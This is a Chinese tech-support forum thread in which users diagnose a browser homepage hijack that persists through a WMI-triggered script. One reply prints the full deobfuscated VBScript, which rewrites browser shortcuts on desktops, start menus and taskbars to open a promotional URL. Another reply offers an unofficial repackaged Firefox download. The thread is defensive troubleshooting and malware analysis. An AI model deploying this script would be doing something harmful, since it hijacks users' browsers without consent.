无忧启动论坛

 找回密码
 注册
搜索
系统gho:最纯净好用系统下载站投放广告、加入VIP会员,请联系 微信:wuyouceo
查看: 5459|回复: 42
打印 上一主题 下一主题

[已解决] 浏览器被劫持网址

[复制链接]
跳转到指定楼层
1#
发表于 2021-8-24 04:02:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
提示: 作者被禁止或删除 内容自动屏蔽
2#
发表于 2021-8-24 06:53:39 | 只看该作者
如何感染此恶意脚本的有没有印象?!
一般需要太复杂的方式处理的话,在允许的情况下建议重装系统来的快。
回复

使用道具 举报

3#
发表于 2021-8-24 06:56:32 来自手机 | 只看该作者
右下角常驻进程,服务里异常服务,或者计划任务定时操作;因为是动态修改,肯定不是启动项那么简单,启动项只是启动了后台驻留操作。
回复

使用道具 举报

4#
发表于 2021-8-24 07:09:27 来自手机 | 只看该作者
edge有此现像么?
回复

使用道具 举报

5#
发表于 2021-8-24 07:11:27 | 只看该作者
能换系统就换吧,不过也没有什么可担心的,只是那些推广员,推广主页链接

    前几年出现的,是一个通过WMI发起的定时自动运行脚本。利用VBScript调用系统服务将所有浏览器加上尾巴!没有进程,没有文件!

    我在一个博客上看过!下载安装WMITool,查看WMI事件!找到感染的代码干掉,再清理浏览器快捷方式尾巴能解决!也许情况会不同,关键是那个代码脚本!很多人称它 病毒脚本!

只能说,现在的推广员真真高手!
回复

使用道具 举报

6#
发表于 2021-8-24 07:54:34 | 只看该作者
这手段有点高明了,这些都没有的话,那就只有服务,计划任务了
其实对付这种玩意,360是老祖宗了有效的很
回复

使用道具 举报

7#
发表于 2021-8-24 10:55:46 | 只看该作者
1.可以用注册表搜索那个网址,看看有没有
2.用安全软件锁定
回复

使用道具 举报

8#
发表于 2021-8-24 11:06:13 | 只看该作者
因为一个主页。要重装系统。也有点。。。但有些顽固的是不好清。在试试吧
回复

使用道具 举报

9#
发表于 2021-8-24 11:09:13 | 只看该作者
36有时还是有用的
回复

使用道具 举报

10#
 楼主| 发表于 2021-8-24 11:30:31 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

11#
 楼主| 发表于 2021-8-24 11:36:05 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

12#
 楼主| 发表于 2021-8-24 11:40:27 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

13#
发表于 2021-8-24 11:40:46 来自手机 | 只看该作者
那就可能是注入正常的系统进程了,那就得杀毒扫描了。
回复

使用道具 举报

14#
 楼主| 发表于 2021-8-24 11:44:33 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

15#
 楼主| 发表于 2021-8-24 11:45:54 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

16#
 楼主| 发表于 2021-8-24 11:47:46 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

17#
 楼主| 发表于 2021-8-24 12:02:54 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

18#
发表于 2021-8-24 12:11:48 | 只看该作者
DOSforever 发表于 2021-8-24 11:44
是的,我就是按照你说的方法查到的,可问题是即便通过 WMI Tools 删掉了定时在快捷方式上加尾巴的恶意 sc ...

有个地址是存储在WMI数据库中,删除了吗,
回复

使用道具 举报

19#
发表于 2021-8-24 12:28:01 | 只看该作者
去火绒论坛求助一下。

评分

参与人数 1无忧币 +5 收起 理由
DOSforever + 5 赞一个!

查看全部评分

回复

使用道具 举报

20#
发表于 2021-8-24 13:03:18 | 只看该作者
本帖最后由 tools241 于 2021-8-24 13:09 编辑

本人特制的Fx91.0esr(64)与Fx(64) v92.0b7 -- 增加封锁 *hao6*.com

本人特制了多版Firefox 免安装 异空版 (已添加>20个元件, 简/繁/英 通用).
Fx91.0esr(64)(64位版元含profile及元件).7z  94.7M  v91.0esr 2021/08/09  -- 已封锁 *hao6*.com
Fx(64)(本版64位元含profile及元件).7z          94.8M  v92.0b7 2021/08/24   -- 已封锁 *hao6*.com

Fx56(免安装异空版,不支援XP,可用新旧套件不可用外挂,32位元含26元件,简繁英通用).rar
Fx17(适1G以下记忆体,简繁英通用).rar
Fx3.6.28(适768M以下记忆体,简繁通用).rar
** 上列各版早已封锁*hao1*.com, *hao5*.com, ...

Firefox -- 链接: https://pan.baidu.com/s/1hx1-WAbC10vi6rdoQySvfA 提取码: pcgk , 解压密码:tools241
回复

使用道具 举报

21#
发表于 2021-8-24 14:10:41 | 只看该作者
DOSforever 发表于 2021-8-24 11:40
没有,只影响以下浏览器:

在它的列表中我只有 IE 和 Firefox 。

iexplorer.exe 和 firefox.exe  改名有效么?
回复

使用道具 举报

22#
发表于 2021-8-24 14:31:35 | 只看该作者
一直被劫持困扰               
回复

使用道具 举报

23#
 楼主| 发表于 2021-8-24 14:38:33 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

24#
 楼主| 发表于 2021-8-24 14:39:37 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

25#
发表于 2021-8-24 15:12:43 | 只看该作者
DOSforever 发表于 2021-8-24 11:40
没有,只影响以下浏览器:

在它的列表中我只有 IE 和 Firefox 。

他是怎么实现锁这些浏览器主页的,可以把原理和工具说一下吗
回复

使用道具 举报

26#
发表于 2021-8-24 16:04:40 | 只看该作者
楼主不妨将恶意脚本的程序上传,我当一回李时珍又如何?!
回复

使用道具 举报

27#
 楼主| 发表于 2021-8-24 16:13:54 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

28#
 楼主| 发表于 2021-8-24 16:17:46 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

29#
发表于 2021-8-24 16:26:43 | 只看该作者
本帖最后由 chishingchan 于 2021-8-24 16:33 编辑
DOSforever 发表于 2021-8-24 16:17
你看下这是不是:

这是 VBScript 脚本,整理一下:
  1. On Error Resume Next

  2. Const link = "http://hao643.com/?r=ggggg&m=e18"
  3. Const link360 = "http://hao643.com/?r=ggggg&m=e18&s=3"

  4. browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

  5. lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

  6. browsersArr = split(browsers,",")

  7. Set oDic = CreateObject("scripting.dictionary")

  8. For Each browser In browsersArr
  9.         oDic.Add LCase(browser), browser
  10. Next

  11. lnkpathsArr = split(lnkpaths,",")

  12. Set oFolders = CreateObject("scripting.dictionary")

  13. For Each lnkpath In lnkpathsArr
  14.         oFolders.Add lnkpath, lnkpath
  15. Next

  16. Set fso = CreateObject("Scripting.Filesystemobject")

  17. Set WshShell = CreateObject("Wscript.Shell")

  18. For Each oFolder In oFolders
  19.         If fso.FolderExists(oFolder) Then
  20.                 For Each file In fso.GetFolder(oFolder).Files
  21.                         If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
  22.                                 Set oShellLink = WshShell.CreateShortcut(file.Path)
  23.                                 path = oShellLink.TargetPath
  24.                                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
  25.                                 If oDic.Exists(LCase(name)) Then
  26.                                         If LCase(name) = LCase("360se.exe") Then
  27.                                                 oShellLink.Arguments = link360
  28.                                         Else
  29.                                                 oShellLink.Arguments = link
  30.                                         End If
  31.                                         If file.Attributes And 1 Then
  32.                                                 file.Attributes = file.Attributes - 1
  33.                                         End If
  34.                                         oShellLink.Save
  35.                                 End If
  36.                         End If
  37.                 Next
  38.         End If
  39. Next
复制代码


回复

使用道具 举报

30#
发表于 2021-8-24 22:09:36 | 只看该作者
DOSforever 发表于 2021-8-24 11:47
搜过,没有。某些安全软件更不安全。

浏览器目录新建一个bat,用start命令打开浏览器,快捷方式指向bat就可以

评分

参与人数 1无忧币 +1 收起 理由
DOSforever + 1

查看全部评分

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1 )

闽公网安备 35020302032614号

GMT+8, 2025-7-30 09:25

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表